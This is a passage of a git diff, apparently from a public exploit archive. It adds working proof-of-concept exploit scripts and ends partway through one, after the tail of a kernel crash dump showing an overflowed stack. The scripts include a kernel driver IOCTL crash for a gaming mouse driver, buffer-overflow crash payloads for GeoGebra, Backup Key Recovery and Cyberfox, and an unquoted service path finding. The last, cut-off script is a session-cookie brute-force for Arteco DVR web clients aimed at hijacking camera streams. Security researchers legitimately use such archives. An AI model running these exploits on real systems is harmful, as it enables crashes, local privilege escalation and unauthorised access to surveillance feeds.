chance) +nt!DbgBreakPointWithStatus +fffff807`2e1feb90 cc int 3 +0 kd !analyze +Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE +Loading Kernel Symbols +............................................................... +................................................................ +........................ + +Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. +Run !sym noisy before .reload to track down problems loading symbols. + +........................................ +............................. +Loading User Symbols +............................................. +Loading unloaded module list +........ + + + Bugcheck Analysis + + + +DRIVER_OVERRAN_STACK_BUFFER (f7) +A driver has overrun a stack-based buffer. This overrun could potentially +allow a malicious user to gain control of this machine. +DESCRIPTION +A driver overran a stack-based buffer (or local variable) in a way that would +have overwritten the function's return address and jumped back to an arbitrary +address when the function returned. This is the classic buffer overrun +hacking attack and the system has been brought down to prevent a malicious user +from gaining complete control of it. +Do a kb to get a stack backtrace -- the last routine on the stack before the +buffer overrun handlers and bugcheck call is the one that overran its local +variable(s). +Arguments +Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack +Arg2 0000f80736bc1742, Expected security check cookie +Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie +Arg4 0000000000000000, zero + +Debugging Details +------------------ + + +BUGCHECK_CODE f7 + +BUGCHECK_P1 bebea1caeaf0a2c1 + +BUGCHECK_P2 f80736bc1742 + +BUGCHECK_P3 ffff07f8c943e8bd + +BUGCHECK_P4 0 + +PROCESS_NAME pythonw.exe + +SYMBOL_NAME GM312Fltr+e1e + +MODULE_NAME GM312Fltr + +IMAGE_NAME GM312Fltr.sys + +FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function + +FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} + +Followup MachineOwner +--------- + +0 kd kb +RetAddr Args to Child Call Site +fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus +fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 +fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 +fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 +fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e +fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 +fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf +fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 +fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 +fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 +fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue +fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 +fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 +fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 +fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 +fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 +fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f +fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 +fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 +41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 +41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 +00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 +00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f +00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0 \ No newline at end of file diff --git a/exploits/windows/dos/50322.py b/exploits/windows/dos/50322.py new file mode 100755 index 000000000..8aae0f2df --- /dev/null +++ b/exploits/windows/dos/50322.py @@ -0,0 +1,32 @@ +# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) +# Date: 27/08/2021 +# Exploit Author: Quadron Research Lab +# Version: all version +# Tested on: Windows 10 x64 HUN/ENG Professional +# Vendor: https://www.redragonzone.com/pages/download +# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE + + +import ctypes, sys +from ctypes import * +import io +from itertools import product +from sys import argv + +devicename = "REDRAGON_MOUSE" + +ioctl = 0x222414 + +kernel32 = windll.kernel32 +hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None) + +if not hevDevice or hevDevice == -1: + print ("Not Win! Sorry!") + +else: + print ("OPENED!") + + buf = '\x44' * 1000 + '\x00' * 1000 + bufLength = 2000 + + kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) \ No newline at end of file diff --git a/exploits/windows/local/49653.py b/exploits/windows/local/49653.py new file mode 100755 index 000000000..fcb17788a --- /dev/null +++ b/exploits/windows/local/49653.py @@ -0,0 +1,26 @@ +# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC) +# Date: 2021-03-15 +# Exploit Author: Brian Rodriguez +# Vendor Homepage: https://www.geogebra.org +# Software Link: https://www.geogebra.org/download +# Version: 6.0.631.0-offlinegraphing +# Tested on: Windows 8.1 Pro + +# STEPS +# Open the program Graficadora +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt in the field "Entrada..." +# Crashed + +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 8000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/windows/local/49654.py b/exploits/windows/local/49654.py new file mode 100755 index 000000000..dbb7ccf58 --- /dev/null +++ b/exploits/windows/local/49654.py @@ -0,0 +1,26 @@ +# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) +# Date: 2021-03-15 +# Exploit Author: Brian Rodriguez +# Vendor Homepage: https://www.geogebra.org +# Software Link: https://www.geogebra.org/download +# Version: 5.0.631.0-d +# Tested on: Windows 8.1 Pro + +#STEPS +# Open the program GeoGebra +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content in the field "Entrada:" +# Crashed + +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 800000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/windows/local/49655.py b/exploits/windows/local/49655.py new file mode 100755 index 000000000..6e1767b28 --- /dev/null +++ b/exploits/windows/local/49655.py @@ -0,0 +1,26 @@ +# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC) +# Date: 2021-03-15 +# Exploit Author: Brian Rodriguez +# Vendor Homepage: https://www.geogebra.org +# Software Link: https://www.geogebra.org/download +# Version: 6.0.631.0-offlinecas +# Tested on: Windows 8.1 Pro + +# STEPS +# Open the program Calculadora CAS +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt in the field "Entrada..." +# Crashed + +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 8000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/windows/local/49966.py b/exploits/windows/local/49966.py new file mode 100755 index 000000000..2b366dbe1 --- /dev/null +++ b/exploits/windows/local/49966.py @@ -0,0 +1,21 @@ +# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe +# Version: 2.2.7.0 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Open BackupKeyRecovery.exe +#3.- Go to Register > Enter Registration Code... +#4.- Write anything in 'Name' field +#5.- Paste clipboard in 'Key' field +#6.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("poc.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/50014.txt b/exploits/windows/local/50014.txt new file mode 100644 index 000000000..b56925919 --- /dev/null +++ b/exploits/windows/local/50014.txt @@ -0,0 +1,31 @@ +# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path +# Discovery by: BRushiran +# Date: 15-06-2021 +# Vendor Homepage: https://www.disksorter.com +# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe +# Tested Version: 13.6.12 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Disk Sorter Enterprise Disk Sorter Enterprise C:\Program Files\Disk +Sorter Enterprise\bin\disksrs.exe Auto + +C:\>sc qc "Disk Sorter Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Sorter Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter +Enterprise\bin\disksrs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Sorter Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50336.py b/exploits/windows/local/50336.py new file mode 100755 index 000000000..f96f9b2fa --- /dev/null +++ b/exploits/windows/local/50336.py @@ -0,0 +1,27 @@ +# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) +# Date: 2021-09-26 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://cyberfox.8pecxstudios.com +# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html +# Version: v52.9.1 (Possibly all versions) +# Tested on: windows + +#[ About - Cyberfox ] : +#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture +#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages. + +# [ Exploit/POC ] : +# 1.Run the python script, it will create a new file "output.txt" +# 2.Run Cyberfox Web Browser +# 3.Copy the content of the file "output.txt" & Paste into the "search bar" +# 4.Crashed + +Overflow = "\x41" * 9000000 +try: + f=open("output.txt","w") + print("[!] Creating %s bytes DOS payload...." %len(Overflow)) + f.write(Overflow) + f.close() + print("[!] File Created !") +except: + print("File cannot be created") \ No newline at end of file diff --git a/exploits/windows/webapps/49348.py b/exploits/windows/webapps/49348.py new file mode 100755 index 000000000..3ca7dea76 --- /dev/null +++ b/exploits/windows/webapps/49348.py @@ -0,0 +1,100 @@ +# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force +# Date: 16.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.arteco-global.com + +#!/usr/bin/env python3 +# +# +# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit +# +# +# Vendor: Arteco S.U.R.L. +# Product web page: https://www.arteco-global.com +# Affected version: n/a +# +# Summary: Arteco DVR/NVR is a mountable industrial surveillance server +# ideal for those who need to manage IP video surveillance designed for +# medium to large installations that require high performance and reliability. +# Arteco can handle IP video sources from all major international manufacturers +# and is compatible with ONVIF and RTSP devices. +# +# Desc: The Session ID 'SessionId' is of an insufficient length and can be +# exploited by brute force, which may allow a remote attacker to obtain a +# valid session, bypass authentication and disclose the live camera stream. +# +# Tested on: Microsoft Windows 10 Enterprise +# Apache/2.4.39 (Win64) OpenSSL/1.0.2s +# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m +# Arteco-Server +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5613 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php +# +# +# 16.11.2020 +# + +import sys,requests + +class BrutusCookius: + + def __init__(self): + self.validate=None + self.cookies=None# + self.params=None## + self.stream=None## + self.path=None#### + self.cgi=None##### + self.ip=None###### + self.op=None###### + + def check(self): + print('Usage: ./arteco.py IP') + exit(9) + + def bro(self): + if len(sys.argv) !=2: + self.check() + else: + self.ip=sys.argv[1] + print('[+] Target IP: '+self.ip) + if not 'http' in self.ip: + self.ip='http://{}'.format(self.ip) + + def force(self): + + # Check the Set-Cookie on the target and determine the length (varies per model/version) + # Cookie: SessionId=15800 - range(10000,100000) + # Cookie: SessionId=8350 - range(1000,10000) + # Cookie: SessionId=502 - 